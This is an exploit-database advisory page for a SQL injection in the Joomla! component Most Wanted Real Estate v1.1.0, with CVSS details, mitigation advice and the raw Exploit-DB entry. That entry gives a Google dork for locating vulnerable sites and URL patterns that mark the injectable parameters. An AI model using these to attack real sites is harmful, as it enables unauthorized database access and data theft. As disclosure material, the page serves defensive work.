Joomla! Component Most Wanted Real Estate v1.1.0 - SQL Injection

vendor:

Most Wanted Real Estate

by:

Ihsan Sencan

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Most Wanted Real Estate

Affected Version From: 1.1.0

Affected Version To: 1.1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mostwantedrealestatesites:most_wanted_real_estate:1.1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7 x64, Kali Linux x64

2017

Joomla! Component Most Wanted Real Estate v1.1.0 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Most Wanted Real Estate v1.1.0. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can allow the attacker to bypass authentication, access, modify and delete data within the database.

Mitigation:

Developers should always use parameterized queries, also known as prepared statements, when interacting with the database. This will ensure that the user input is treated as a string value instead of part of the SQL query.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component Most Wanted Real Estate v1.1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_mostwantedrealestate
# Date: 18.02.2017
# Vendor Homepage: http://mostwantedrealestatesites.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/most-wanted-real-estate/
# Demo: http://demo.mostwantedrealestatesites.com/
# Version: 1.1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=&filter_a1minland=&filter_a1maxland=&filter_a1landtype=0&which_order=[SQL]
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=[SQL]
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=[SQL]
# Etc...
# # # # #